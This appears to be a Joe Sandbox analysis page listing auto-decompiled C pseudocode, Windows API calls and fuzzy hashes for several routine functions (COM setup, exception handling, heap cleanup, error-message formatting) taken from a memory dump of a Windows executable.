Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 5392599e0c6ba6f558373731fb6dfdfc48881df1c8ae2eca318e75daf34c3e07
Instruction ID: 711a01d99e8dccbf2a08334a1a922568dc0dbf5e303e3a49cacb3bac5449839e
Opcode Fuzzy Hash: 5392599e0c6ba6f558373731fb6dfdfc48881df1c8ae2eca318e75daf34c3e07
Instruction Fuzzy Hash: C4110A71D00209EBDB20DBB8D94DA9EB7F4FF58311F65499AD805E7210EA359B449B80

Uniqueness

Uniqueness Score: -1.00%

Function 000C3E1D Relevance: 6.1, APIs: 4, Instructions: 56comCOMMON

Download Yara Rule

APIs

CoInitializeEx.API-MS-WIN-CORE-COM-L1-1-0(00000000,00000006), ref: 000C3E39
CLSIDFromString.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 000C3E48
CoCreateInstance.API-MS-WIN-CORE-COM-L1-1-0(?,00000000,00000001,000C1914,?,?,?), ref: 000C3E63
CoUninitialize.API-MS-WIN-CORE-COM-L1-1-0(?,?), ref: 000C3E94

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: CreateFromInitializeInstanceStringUninitialize
String ID:
API String ID: 2575628211-0
Opcode ID: 640341d4caa00ea13817f9ec21085cd8ea08cb6f167b1811a50a4858efcf3846
Instruction ID: f9a4c911e9d43712e7621b87dba1b264a210b00338c3a21aba329f80a7964cbf
Opcode Fuzzy Hash: 640341d4caa00ea13817f9ec21085cd8ea08cb6f167b1811a50a4858efcf3846
Instruction Fuzzy Hash: 9A113C31700619AFE710DB65DC49FEE7BB9EB48710F104059EA06E7290DB35AE01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000C6232 Relevance: 6.0, APIs: 4, Instructions: 13
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E000C6232(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x000c6239
0x000c6242
0x000c625b

APIs

SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,000C6368,000C1000), ref: 000C6239
UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(000C6368,?,000C6368,000C1000), ref: 000C6242
GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,000C6368,000C1000), ref: 000C624D
TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,000C6368,000C1000), ref: 000C6254

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: cdedfa6a08de6323d9ebd9f2996ea91cf7adda940d9664ba0728e9c90de3f3b7
Instruction ID: 98567a9e2ff814748163ed7e823ab93af7afe7c5dfdc6c32c580de784e35de24
Opcode Fuzzy Hash: cdedfa6a08de6323d9ebd9f2996ea91cf7adda940d9664ba0728e9c90de3f3b7
Instruction Fuzzy Hash: D8D0C932000104FFEB002BE1EC0EE493E28EB44312F184400FB1A82021CB3954118B61

Uniqueness

Uniqueness Score: -1.00%

Function 000C6C10 Relevance: 5.1, APIs: 4, Instructions: 79
memoryCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E000C6C10(void* __eax, void* __edx) {
				signed int _v8;
				long _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t19;
				long _t28;
				void* _t30;
				void* _t31;
				void* _t32;
				void* _t43;
				intOrPtr* _t44;
				long _t47;
				void* _t48;
				signed int _t52;

				_t41 = __edx;
				_t32 =  *0xc8004;
				if(_t32 != 0) {
					_t50 = _t52;
					_push(_t32);
					_push(_t32);
					_v8 =  *0xc8018 ^ _t52;
					_t30 = _t32;
					_t34 = _t30 + 4;
					E000C4A76(_t30 + 4, __edx,  &_v12);
					_t19 =  *_t30 - 1;
					 *_t30 = _t19;
					if(_t19 != 0) {
						_t47 = _v12;
						goto L13;
					} else {
						_t47 = 0;
						E000C45EB(_t30 + 8, 0);
						_t38 = _t30 + 0xc;
						_t19 = E000C45EB(_t30 + 0xc, 0);
						if(_v12 != 0) {
							_t28 = GetLastError();
							_push(_v12);
							_t19 = E000C29A8(_t38);
							SetLastError(_t28);
						}
						if( *0xc8404 == 0) {
							_t44 =  *0xc8410;
							if(_t44 == 0) {
								_t19 = _t47;
							} else {
								 *0xc9294();
								_t19 =  *_t44() & 0x000000ff;
							}
							if(_t19 == 0) {
								E000C4A20(_t30 + 0x18);
								_t34 = _t30 + 8;
								E000C48D2(_t30 + 8);
								if( *((intOrPtr*)(_t30 + 4)) != _t47) {
									_push( *((intOrPtr*)(_t30 + 4)));
									E000C2981(_t30, _t34);
								}
								_t19 = HeapFree(GetProcessHeap(), _t47, _t30);
								L13:
								if(_t47 != 0) {
									_push(_t47);
									_t19 = E000C29A8(_t34);
								}
							}
						}
					}
					_pop(_t43);
					_pop(_t48);
					_pop(_t31);
					return E000C6160(_t19, _t31, _v8 ^ _t50, _t41, _t43, _t48);
				} else {
					return __eax;
				}
			}

0x000c6c10
0x000c6c10
0x000c6c18
0x000c47dc
0x000c47de
0x000c47df
0x000c47e7
0x000c47ed
0x000c47f6
0x000c47f9
0x000c4800
0x000c4803
0x000c4805
0x000c4891
0x00000000
0x000c480b
0x000c480b
0x000c4811
0x000c4817
0x000c481a
0x000c4822
0x000c4824
0x000c482a
0x000c482f
0x000c4835
0x000c4835
0x000c4842
0x000c4844
0x000c484c
0x000c485d
0x000c484e
0x000c4850
0x000c4858
0x000c4858
0x000c4861
0x000c4866
0x000c486b
0x000c486e
0x000c4876
0x000c4878
0x000c487b
0x000c487b
0x000c4889
0x000c4894
0x000c4896
0x000c4898
0x000c4899
0x000c4899
0x000c4896
0x000c4861
0x000c4842
0x000c48a1
0x000c48a2
0x000c48a5
0x000c48ae
0x000c6c1e
0x000c6c1e
0x000c6c1e

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?), ref: 000C4824
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?), ref: 000C4835
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 000C4882
HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,?), ref: 000C4889

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: ErrorHeapLast$FreeProcess
String ID:
API String ID: 1234203156-0
Opcode ID: b8fb9b99c82968fa3b0606bdeb936c331b6ff61eb842eafd416948acf313174c
Instruction ID: 111c118aaac454479c37feaeee9fd1cf67697c376143d3c44df220933653a158
Opcode Fuzzy Hash: b8fb9b99c82968fa3b0606bdeb936c331b6ff61eb842eafd416948acf313174c
Instruction Fuzzy Hash: C421BE71900114EFDB24AF60ECA9FBEBBA8FF51711B14815CF8069A196DF349D08D7A1

Uniqueness

Uniqueness Score: -1.00%

Function 000C2512 Relevance: 4.8, APIs: 3, Instructions: 285threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,00000000,00000000), ref: 000C25CB
IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0 ref: 000C26A4
OutputDebugStringW.API-MS-WIN-CORE-DEBUG-L1-1-0(?,?,?,?,?,?,00000002,8007029C), ref: 000C272A

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: CurrentDebugDebuggerOutputPresentStringThread
String ID:
API String ID: 4268342597-0
Opcode ID: 073a491d4d450bdb02bef6c2a72ce5712aa9b3fe468ab5c1ea4577ece094f8cd
Instruction ID: 1c75b83aa0deaee185f5b33cb4576a1806ed2cbdccec0e316371c00b98e79387
Opcode Fuzzy Hash: 073a491d4d450bdb02bef6c2a72ce5712aa9b3fe468ab5c1ea4577ece094f8cd
Instruction Fuzzy Hash: 20A1AC71A00255AFDB61DF28CC48FAFBBE5EF88710F15851EE845D3660DB34A941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 000C4C9B Relevance: 3.3, APIs: 2, Instructions: 311
COMMONCrypto

Download Yara Rule

C-Code - Quality: 33%

			E000C4C9B(intOrPtr* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr* _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t110;
				signed int _t118;
				intOrPtr _t120;
				void* _t121;
				intOrPtr _t126;
				signed int _t128;
				signed int _t131;
				signed int _t135;
				intOrPtr* _t140;
				signed int _t146;
				intOrPtr _t148;
				signed int _t153;
				signed int _t155;
				signed int _t156;
				signed int _t157;
				signed int _t158;
				void* _t172;
				signed int _t174;
				intOrPtr* _t191;
				signed int _t201;
				signed int _t207;
				signed int _t209;
				signed int _t211;
				void* _t212;
				void* _t213;
				signed int _t215;
				signed int _t220;
				signed int _t224;

				_v8 =  *0xc8018 ^ _t220;
				_t211 = 0;
				_v48 = __ecx;
				_t155 = 0;
				_t160 = 0xc6d5c;
				_v28 = 0;
				_t207 = E000C336A(0xc6d5c, 0xc6d64, __ecx);
				_v40 = _t207;
				_push(4);
				_t224 = _t207;
				if(_t224 == 0) {
					L29:
					_t207 = 0xc6d68;
					_t198 = 0xc6d68;
					_t110 = E000C336A(0xc6d64, 0xc6d68, _t160);
					_t239 = _t110;
					if(_t110 != 0) {
						_push(0xc1300);
						_push(4);
						_t198 = E000C6516(_t155, 0xc6d68, _t211, _t239,  ~(0 | _t239 > 0x00000000) | _t110 * 0x000c6d68);
						_v12 = _t198;
						if(_t198 == 0) {
							_t155 = 0x8007000e;
						}
						if(_t155 >= 0) {
							_v20 = _t211;
							_v16 = _t211;
							_t156 = _t211;
							asm("sbb edi, edi");
							_t207 =  !_t207 & 3 >> 0x00000002;
							_t118 = 0xc6d68;
							_v36 = 0xc6d68;
							if(_t207 > 0) {
								_t174 = _t211;
								do {
									_t212 =  *_t118;
									if(_t212 != 0) {
										 *0xc9294();
										_t126 =  *((intOrPtr*)( *((intOrPtr*)(_t212 + 4))))();
										_t198 = _v12;
										_t174 = _v16;
										 *((intOrPtr*)(_v12 + _t156 * 4)) = _t126;
										_t156 = _t156 + 1;
										_t118 = _v36;
									}
									_t213 = 4;
									_t118 = _t118 + _t213;
									_t174 = _t174 + 1;
									_v36 = _t118;
									_v16 = _t174;
								} while (_t174 < _t207);
								_t211 = 0;
							}
							_t120 =  *_v48;
							_t248 =  *((intOrPtr*)(_t120 + 0x20)) - E000C43E0;
							if( *((intOrPtr*)(_t120 + 0x20)) != E000C43E0) {
								_t155 = 0x80004001;
								__imp__RoOriginateError(0x80004001, _t211);
							} else {
								_t155 = E000C4FE7(_t198, _t248,  &_v20, _t156);
							}
							if(_t155 >= 0 && _t207 != 0) {
								_t201 = 0xc6d68;
								_t121 = 4;
								do {
									_t172 =  *_t201;
									if(_t172 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t172 + 0xc)) + 4)) = _v20;
										_t121 = 4;
									}
									_t201 = _t201 + _t121;
									_t211 = _t211 + 1;
								} while (_t211 < _t207);
							}
							_t198 = _v12;
						}
						_push(_t198);
						L000C5E27();
					}
				} else {
					_push(0xc1300);
					_t128 = E000C6516(0, _t207, 0, _t224,  ~(0 | _t224 > 0x00000000) | _t109 * 0x000c6d64);
					_push(0xc1300);
					_v12 = _t128;
					_push(4);
					_t131 = E000C6516(0, _t207, 0, _t224,  ~(0 | _t224 > 0x00000000) | _t207 * 0x000c6d64);
					_push(0xc1300);
					_v32 = _t131;
					_push(0x10);
					_t160 =  ~(_t224 > 0) | _t207 * 0x000c6d64;
					_t198 = E000C6516(0, _t207, 0, _t224,  ~(_t224 > 0) | _t207 * 0x000c6d64);
					_v36 = _t198;
					if(_v12 == 0) {
						L27:
						_t155 = 0x8007000e;
					} else {
						_t160 = _v32;
						if(_v32 == 0 || _t198 == 0) {
							goto L27;
						} else {
							_t209 = 0xc6d60;
							_v24 = 0;
							_v16 = 0xc6d60;
							_t135 = 0xc6d60;
							if(0xc6d60 >= 0xc6d64) {
								L14:
								if( *((intOrPtr*)( *_v48 + 0x28)) != E000C4250) {
									_t155 = E000C5103(_t198, _t160, _v12, _v40);
									_v28 = _t155;
									__eflags = _t155;
									if(_t155 >= 0) {
										_v20 = _t211;
										_t198 = _t211;
										__eflags = 0xc6d64 - _t209;
										_v24 = _t198;
										asm("sbb ecx, ecx");
										_t160 =  !0xc6d64 & 0x000c6d67 - _t209 >> 0x00000002;
										__eflags = 0xc6d64;
										_v40 = 0xc6d64;
										if(0xc6d64 > 0) {
											_t158 = _v12;
											_t146 = _t211;
											do {
												__eflags =  *_t209;
												if( *_t209 != 0) {
													_t60 =  &_v24;
													 *_t60 = _v24 + 1;
													__eflags =  *_t60;
													_t148 =  *((intOrPtr*)(_t158 + _t198 * 4));
													_t198 = _v24;
													 *((intOrPtr*)( *((intOrPtr*)( *_t209 + 0xc)) + 4)) = _t148;
													_t160 = _v40;
													_t146 = _v20;
												}
												_t209 = _t209 + 4;
												_t146 = _t146 + 1;
												_v20 = _t146;
												__eflags = _t146 - _t160;
											} while (_t146 < _t160);
											_t155 = _v28;
										}
									}
								} else {
									_t155 = 0x80004001;
									__imp__RoOriginateError(0x80004001, _t211);
									_v28 = 0x80004001;
								}
							} else {
								_v20 = _t198;
								while(_t155 >= 0) {
									_t191 =  *_t135;
									if(_t191 != 0) {
										_v52 = 2;
										_v44 = _t211;
										 *0xc9294( &_v52, _t191, 0xc1924,  &_v44);
										_t155 =  *((intOrPtr*)( *_t191))();
										_v28 = _t155;
										if(_t155 >= 0) {
											_t153 = _v24;
											_t198 = _v32;
											 *(_v32 + _t153 * 4) = _v44;
											_v24 = _t153 + 1;
											_v20 = _v20 + 0x10;
											asm("movsd");
											asm("movsd");
											asm("movsd");
											asm("movsd");
										}
										_t135 = _v16;
										_t211 = 0;
									}
									_t160 = 4;
									_t135 = _t135 + _t160;
									_v16 = _t135;
									if(_t135 < 0xc6d64) {
										continue;
									} else {
										if(_t155 >= 0) {
											_t160 = _v32;
											_t209 = 0xc6d60;
											_t198 = _v36;
											goto L14;
										}
									}
									goto L23;
								}
							}
							L23:
							_t207 = _v24;
							_v40 = _t211;
							if(_t207 != 0) {
								_t157 = _t211;
								do {
									_t140 =  *((intOrPtr*)(_v32 + _t157 * 4));
									_t76 =  *_t140 + 8; // 0x1
									_t215 =  *_t76;
									_t160 = _t215;
									 *0xc9294(_t140);
									 *_t215();
									_t157 = _t157 + 1;
								} while (_t157 < _t207);
								_t155 = _v28;
								_t211 = 0;
							}
						}
					}
					_push(_v12);
					L000C5E27();
					_push(_v36);
					L000C5E27();
					_push(_v32);
					L000C5E27();
					if(_t155 >= 0) {
						goto L29;
					}
				}
				return E000C6160(_t155, _t155, _v8 ^ _t220, _t198, _t207, _t211);
			}

0x000c4caa
0x000c4cb0
0x000c4cb2
0x000c4cb6
0x000c4cbd
0x000c4cc2
0x000c4cca
0x000c4ccc
0x000c4ccf
0x000c4cd2
0x000c4cd4
0x000c4ed3
0x000c4ed4
0x000c4ede
0x000c4ee0
0x000c4ee5
0x000c4ee7
0x000c4eed
0x000c4ef4
0x000c4f06
0x000c4f08
0x000c4f0f
0x000c4f11
0x000c4f11
0x000c4f18
0x000c4f23
0x000c4f2b
0x000c4f30
0x000c4f37
0x000c4f3b
0x000c4f3d
0x000c4f3f
0x000c4f42
0x000c4f44
0x000c4f46
0x000c4f46
0x000c4f4a
0x000c4f51
0x000c4f57
0x000c4f59
0x000c4f5c
0x000c4f5f
0x000c4f62
0x000c4f63
0x000c4f63
0x000c4f68
0x000c4f69
0x000c4f6b
0x000c4f6c
0x000c4f6f
0x000c4f72
0x000c4f76
0x000c4f76
0x000c4f7b
0x000c4f7d
0x000c4f84
0x000c4f95
0x000c4f9b
0x000c4f86
0x000c4f90
0x000c4f90
0x000c4fa3
0x000c4fab
0x000c4fb0
0x000c4fb1
0x000c4fb1
0x000c4fb5
0x000c4fbf
0x000c4fc2
0x000c4fc2
0x000c4fc3
0x000c4fc5
0x000c4fc6
0x000c4fb1
0x000c4fca
0x000c4fca
0x000c4fcd
0x000c4fce
0x000c4fd3
0x000c4cda
0x000c4cde
0x000c4ceb
0x000c4cf0
0x000c4cf5
0x000c4cfa
0x000c4d09
0x000c4d0e
0x000c4d13
0x000c4d18
0x000c4d24
0x000c4d2f
0x000c4d31
0x000c4d37
0x000c4eab
0x000c4eab
0x000c4d3d
0x000c4d3d
0x000c4d42
0x00000000
0x000c4d50
0x000c4d50
0x000c4d55
0x000c4d58
0x000c4d5b
0x000c4d63
0x000c4df5
0x000c4e01
0x000c4e21
0x000c4e23
0x000c4e26
0x000c4e28
0x000c4e2f
0x000c4e3c
0x000c4e3e
0x000c4e40
0x000c4e43
0x000c4e47
0x000c4e47
0x000c4e49
0x000c4e4c
0x000c4e4e
0x000c4e51
0x000c4e53
0x000c4e53
0x000c4e56
0x000c4e5a
0x000c4e5a
0x000c4e5a
0x000c4e60
0x000c4e63
0x000c4e66
0x000c4e69
0x000c4e6c
0x000c4e6c
0x000c4e6f
0x000c4e72
0x000c4e73
0x000c4e76
0x000c4e76
0x000c4e7a
0x000c4e7a
0x000c4e4c
0x000c4e03
0x000c4e04
0x000c4e0a
0x000c4e10
0x000c4e10
0x000c4d69
0x000c4d69
0x000c4d6c
0x000c4d74
0x000c4d78
0x000c4d7d
0x000c4d8e
0x000c4d96
0x000c4d9e
0x000c4da0
0x000c4da5
0x000c4da7
0x000c4daa
0x000c4db3
0x000c4dc1
0x000c4dc4
0x000c4dca
0x000c4dcb
0x000c4dcc
0x000c4dcd
0x000c4dcd
0x000c4dce
0x000c4dd1
0x000c4dd1
0x000c4dd5
0x000c4dd6
0x000c4dd8
0x000c4de0
0x00000000
0x000c4de2
0x000c4de4
0x000c4dea
0x000c4ded
0x000c4df2
0x00000000
0x000c4df2
0x000c4de4
0x00000000
0x000c4de0
0x000c4d6c
0x000c4e7d
0x000c4e7d
0x000c4e80
0x000c4e85
0x000c4e87
0x000c4e89
0x000c4e8c
0x000c4e92
0x000c4e92
0x000c4e95
0x000c4e97
0x000c4e9d
0x000c4e9f
0x000c4ea0
0x000c4ea4
0x000c4ea7
0x000c4ea7
0x000c4e85
0x000c4d42
0x000c4eb0
0x000c4eb3
0x000c4eb8
0x000c4ebb
0x000c4ec0
0x000c4ec3
0x000c4ecd
0x00000000
0x00000000
0x000c4ecd
0x000c4fe6

APIs

RoOriginateError.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80004001,00000000,?,?,00000000,00000000,00000000,00000000), ref: 000C4E0A
RoOriginateError.API-MS-WIN-CORE-WINRT-ERROR-L1-1-0(80004001,00000000,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,000C3685), ref: 000C4F9B

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: ErrorOriginate
String ID:
API String ID: 2737598581-0
Opcode ID: a3805a136d8ed0f9e66c237f979fe0a0836935ce0ac71da382872b2cdf50a92b
Instruction ID: 397e00c3c97c34f10d7cde49a629a0cb8da67784e037ebd583fca9b23ed1a5a7
Opcode Fuzzy Hash: a3805a136d8ed0f9e66c237f979fe0a0836935ce0ac71da382872b2cdf50a92b
Instruction Fuzzy Hash: F6A16C75F002199BDB24CFA8C891FAEBBF5FF88710F15452EE906AB351CA759D018B90

Uniqueness

Uniqueness Score: -1.00%

Function 000C3D9F Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 30%

			E000C3D9F(void* __eax, void* __ecx) {
				char _v8;
				void* _t14;
				signed int _t15;
				signed char _t16;
				void* _t24;
				intOrPtr _t26;

				_t14 = __eax;
				_push(__ecx);
				_t26 =  *[fs:0x30];
				RtlImageNtHeader(__ecx);
				_t24 = _t14;
				if( *((short*)(_t24 + 0x14)) != 0) {
					_t16 =  *(_t24 + 0x4c);
					if(_t16 != 0) {
						 *(_t26 + 0xa4) = _t16 & 0x000000ff;
						 *(_t26 + 0xa8) =  *(_t24 + 0x4d) & 0x000000ff;
						 *((short*)(_t26 + 0xac)) =  *((intOrPtr*)(_t24 + 0x4e));
						 *(_t26 + 0xb0) = ( *(_t24 + 0x4c) ^ 0xbfffffff) >> 0x1e;
					}
				}
				_t15 =  &_v8;
				__imp__ImageDirectoryEntryToData( *((intOrPtr*)(_t26 + 8)), 1, 0xa, _t15);
				if(_t15 != 0) {
					_t15 =  *(_t15 + 0x34) & 0x0000ffff;
					if(_t15 != 0) {
						 *(_t26 + 0xae) = _t15;
					}
				}
				return _t15;
			}

0x000c3d9f
0x000c3da4
0x000c3da6
0x000c3dae
0x000c3db4
0x000c3dbb
0x000c3dbd
0x000c3dc2
0x000c3dc7
0x000c3dd1
0x000c3ddb
0x000c3ded
0x000c3ded
0x000c3dc2
0x000c3df3
0x000c3dfe
0x000c3e06
0x000c3e08
0x000c3e0f
0x000c3e11
0x000c3e11
0x000c3e0f
0x000c3e1c

APIs

RtlImageNtHeader.NTDLL ref: 000C3DAE
ImageDirectoryEntryToData.IMAGEHLP(?,00000001,0000000A,?), ref: 000C3DFE

Memory Dump Source

Source File: 00000003.00000002.298453184.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true

Associated: 00000003.00000002.298449492.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298458296.00000000000C9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.298463618.00000000000CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_c0000_r3F3.jbxd

Similarity

API ID: Image$DataDirectoryEntryHeader
String ID:
API String ID: 3478907836-0
Opcode ID: 41b26595bfa0f6f1882efcbaa5e9b9b7ac3a406eb33eb51eba99657172ec6375
Instruction ID: 0b796eb738c65c1ecdbb26b26e1435bd0d17c654d2898c587ee138dec94d3460
Opcode Fuzzy Hash: 41b26595bfa0f6f1882efcbaa5e9b9b7ac3a406eb33eb51eba99657172ec6375
Instruction Fuzzy Hash: 6B01F2356203459FD3208F25C804BA7B7E8FF0A700F04419DE896CB2C1E770EA80C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 000C20D6 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 166
windowthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 23%

			E000C20D6(signed short* __ecx, signed int __edx, intOrPtr* _a4) {
				signed int _v8;
				short _v520;
				char* _v524;
				signed int _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t45;
				signed short* _t50;
				void* _t53;
				void* _t54;
				signed short* _t58;
				void* _t59;
				void* _t60;
				signed short* _t65;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				signed int _t78;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;

				_t73 = __edx;
				_v8 =  *0xc8018 ^ _t78;
				_t65 = __ecx;
				_v528 = __edx;
				_t77 = _a4;
				if(__edx == 0 || __ecx == 0) {
					L31:
					return E000C6160(0, _t65, _v8 ^ _t78, _t73, _t74, _t77);
				} else {
					_push(_t74);
					_t75 =  *0xc83dc;
					 *__ecx = 0;
					if(_t75 == 0 ||  *0xc83e8 == 0) {
						L5:
						_v524 = 0xc161c;
						_t45 =  *_t77;
						if(_t45 == 0) {
							_v524 = "Exception";
						} else {
							_t59 = _t45 - 1;
							if(_t59 == 0) {
								_v524 = "ReturnHr";
							} else {
								_t60 = _t59 - 1;
								if(_t60 == 0) {
									_v524 = "LogHr";
								} else {
									if(_t60 == 1) {
										_v524 = "FailFast";
									}
								}
							}
						}
						_v520 = 0;
						FormatMessageW(0x1200, 0,  *(_t77 + 4), 0x400,  &_v520, 0x100, 0);
						_push( *((intOrPtr*)(_t77 + 0x48)));
						_push( *((intOrPtr*)(_t77 + 0x44)));
						_t76 = _t65 + _v528 * 2;
						if( *((intOrPtr*)(_t77 + 0x1c)) == 0) {
							_push(L"%hs!%p: ");
							_push(_t76);
							_push(_t65);
							_t50 = E000C2080();
							_t80 = _t79 + 0x14;
						} else {
							_push( *((intOrPtr*)(_t77 + 0x20)));
							_t50 = E000C2080(_t65, _t76, L"%hs(%d)\\%hs!%p: ",  *((intOrPtr*)(_t77 + 0x1c)));
							_t80 = _t79 + 0x1c;
						}
						_t65 = _t50;
						if( *((intOrPtr*)(_t77 + 0x4c)) != 0) {
							_t58 = E000C2080(_t65, _t76, L"(caller: %p) ",  *((intOrPtr*)(_t77 + 0x4c)));
							_t80 = _t80 + 0x10;
							_t65 = _t58;
						}
						_push( &_v520);
						_push( *(_t77 + 4));
						_push(GetCurrentThreadId());
						_push( *((intOrPtr*)(_t77 + 0x24)));
						_t53 = E000C2080(_t65, _t76, L"%hs(%d) tid(%x) %08X %ws", _v524);
						_t81 = _t80 + 0x20;
						if( *((intOrPtr*)(_t77 + 0xc)) != 0 ||  *((intOrPtr*)(_t77 + 0x28)) != 0 ||  *((intOrPtr*)(_t77 + 0x18)) != 0) {
							_push(L"    ");
							_push(_t76);
							_push(_t53);
							_t54 = E000C2080();
							_t82 = _t81 + 0xc;
							if( *((intOrPtr*)(_t77 + 0xc)) != 0) {
								_t54 = E000C2080(_t54, _t76, L"Msg:[%ws] ",  *((intOrPtr*)(_t77 + 0xc)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x28)) != 0) {
								_t54 = E000C2080(_t54, _t76, L"CallContext:[%hs] ",  *((intOrPtr*)(_t77 + 0x28)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x14)) == 0) {
								if( *((intOrPtr*)(_t77 + 0x18)) == 0) {
									_push("\n");
									_push(_t76);
									_push(_t54);
									E000C2080();
								} else {
									E000C2080(_t54, _t76, L"[%hs]\n",  *((intOrPtr*)(_t77 + 0x18)));
								}
							} else {
								_push( *((intOrPtr*)(_t77 + 0x14)));
								E000C2080(_t54, _t76, L"[%hs(%hs)]\n",  *((intOrPtr*)(_t77 + 0x18)));
							}
						}
						goto L30;
					} else {
						 *0xc9294(_t77, __ecx, __edx);
						 *_t75();
						if(( *__ecx & 0x0000ffff) != 0) {
							L30:
							_pop(_t74);
							goto L31;
						}
						goto L5;
					}
				}
			}

0x000c20d6
0x000c20e8
0x000c20ee
0x000c20f0
0x000c20f7
0x000c20fc
0x000c22cf
0x000c22e0
0x000c210a
0x000c210a
0x000c210b
0x000c2113
0x000c2118
0x000c213b
0x000c213f
0x000c2149
